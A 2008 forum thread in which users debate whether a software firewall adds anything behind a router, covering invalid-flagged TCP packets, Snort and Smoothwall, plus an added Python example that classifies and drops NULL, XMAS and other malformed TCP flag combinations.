But a good software firewall will let you create granular user-specific rules, something that is not possible with a router, at least not with the ones we are using. A NULL packet is one of many invalid-flagged TCP packets and something that is certainly not desirable - it will connect nowhere and will deliver its payload nowhere. So Jetico has (in the case of NULL packets, default) rules to allow you filtering of these undesirable (unsolicited/invalid-flagged) packets. That is all. I don't have to live with it or use an IP blocker if I don't want to. I just need to use a good firewall.

Cheers,

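As an added illustration of the invalid-flag filtering Seer describes above (example code written for this page, not code from the thread or from Jetico): a small Python classifier that reads the flag byte out of a raw TCP header and marks NULL, XMAS and other contradictory flag combinations for dropping. The list of combinations treated as invalid and the constructed sample headers are assumptions made for the demonstration.

```python
import struct

# Classic TCP flag bits in byte 13 of the header (CWR/ECE are ignored here).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def tcp_flags(segment: bytes) -> int:
    """Return the six classic flag bits from a raw TCP header (>= 20 bytes)."""
    if len(segment) < 20:
        raise ValueError("TCP header too short")
    return segment[13] & 0x3F


def classify_flags(flags: int) -> str:
    """Label a flag combination; 'ok' means nothing obviously invalid.

    The combinations below are the ones commonly rejected as invalid-flagged
    by stateful firewalls (an assumption for this example, not Jetico's list).
    """
    if flags == 0:
        return "NULL"                      # no flags at all
    if flags & (FIN | PSH | URG) == (FIN | PSH | URG):
        return "XMAS"                      # FIN+PSH+URG lit up together
    if flags & SYN and flags & FIN:
        return "SYN+FIN"                   # open and close in one segment
    if flags & SYN and flags & RST:
        return "SYN+RST"                   # open and abort in one segment
    if flags & FIN and not flags & ACK:
        return "FIN-without-ACK"           # a real FIN always carries ACK
    return "ok"


def build_tcp_header(src_port: int, dst_port: int, flags: int) -> bytes:
    """Constructed minimal 20-byte TCP header: data offset 5, zero checksum."""
    return struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0,
                       5 << 4, flags, 8192, 0, 0)


def filter_segments(segments):
    """Split raw headers into (passed, dropped); dropped entries carry the reason."""
    passed, dropped = [], []
    for seg in segments:
        verdict = classify_flags(tcp_flags(seg))
        (passed if verdict == "ok" else dropped).append(
            seg if verdict == "ok" else (verdict, seg))
    return passed, dropped


if __name__ == "__main__":
    # Constructed traffic toward a forwarded P2P-style port: one normal SYN,
    # one NULL probe, one XMAS probe.
    sample = [build_tcp_header(40000, 6881, SYN),
              build_tcp_header(40001, 6881, 0),
              build_tcp_header(40002, 6881, FIN | PSH | URG)]
    ok, bad = filter_segments(sample)
    print(len(ok), "passed;", [reason for reason, _ in bad], "dropped")
```

The forwarded port still accepts legitimate SYNs, which is the point Seer makes: the rule drops only the packets that could never complete a connection anyway.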
jmonge
November 8th, 2008, 01:18 AM
-{ Quote: "1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.

2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer.

----" }-

I agree. If we have good, strong, solid antimalware protection, well, no malware is sending anything out, unless you are already infected ;D

Arup
November 8th, 2008, 01:42 AM
-{ Quote: "Arup,

when you P2P you would need to forward port(s) in your software firewall as well. So the software firewall will also pass the unsolicited traffic through. This is a must if you want to P2P, as you said.
But a good software firewall will let you create granular user-specific rules, something that is not possible with a router, at least not with the ones we are using. A NULL packet is one of many invalid-flagged TCP packets and something that is certainly not desirable - it will connect nowhere and will deliver its payload nowhere. So Jetico has (in the case of NULL packets, default) rules to allow you to filter these undesirable (unsolicited/invalid-flagged) packets. That is all. I don't have to live with it or use an IP blocker if I don't want to. I just need to use a good firewall.

Cheers," }-

I see your point. In that case, if I am worried, I will set up an old PC with a Celeron and run it with a Linux firewall like Snort etc. That way I have total control of what goes in or out.

Seer
November 8th, 2008, 04:28 AM
-{ Quote: "I will set up an old PC with a Celeron and run it with a Linux firewall like Snort etc." }-

Um... Snort is not a Linux firewall. It is an Intrusion Detection System and will filter nothing by itself. It will monitor network connections and allow you to create granular connection-specific rules which are not possible to create by the means of ordinary firewalls.
Perhaps you were referring to Untangle, IPcop and such...?

noone_particular
November 8th, 2008, 09:27 AM
-{ Quote: "1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.
2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer." }-
Try reading the first half of this thread. Stop twisting my preference for a separate internet firewall into meaning that an internet firewall is all that's necessary. At no point did I say that an internet firewall was all a user needs. The OP asked:
-{ Quote: "is an extra software firewall REALLY needed if you already have a hardware one?......but id like to see your reasons why a software firewall is needed?" }-

noone_particular
November 8th, 2008, 09:36 AM
-{ Quote: "I will set up an old PC with a Celeron and run it with a Linux firewall like Snort etc." }-
Take a look at Smoothwall (http://smoothwall.org/). I haven't tried 3.0 but 2.0 has Snort built into the firewall. It'll easily run on a Celeron.

Rmus
November 8th, 2008, 10:24 AM
-{ Quote: "Stop twisting my preference for a separate internet firewall into meaning that an internet firewall is all that's necessary. At no point did I say that an internet firewall was all a user needs." }-

I'm not twisting anything -- just responding to your comment,
-{ Quote: "IMO, the internet firewall is the most important security app for keeping your personal data private." }-and showing that XSS can send out data in spite of an internet firewall, meaning that in this case, an internet firewall is not the most important security application.

My response to the OP's question was in agreement with Kerodos's post #3,

-{ Quote: "This question has been asked over and over, and the answer is always the same. It's up to you. If you have a router, then the only thing a software firewall will do for you is attempt to catch outbound traffic. If that's something you want, then use one, if not, then you don't need it." }-

My emphasis added.

----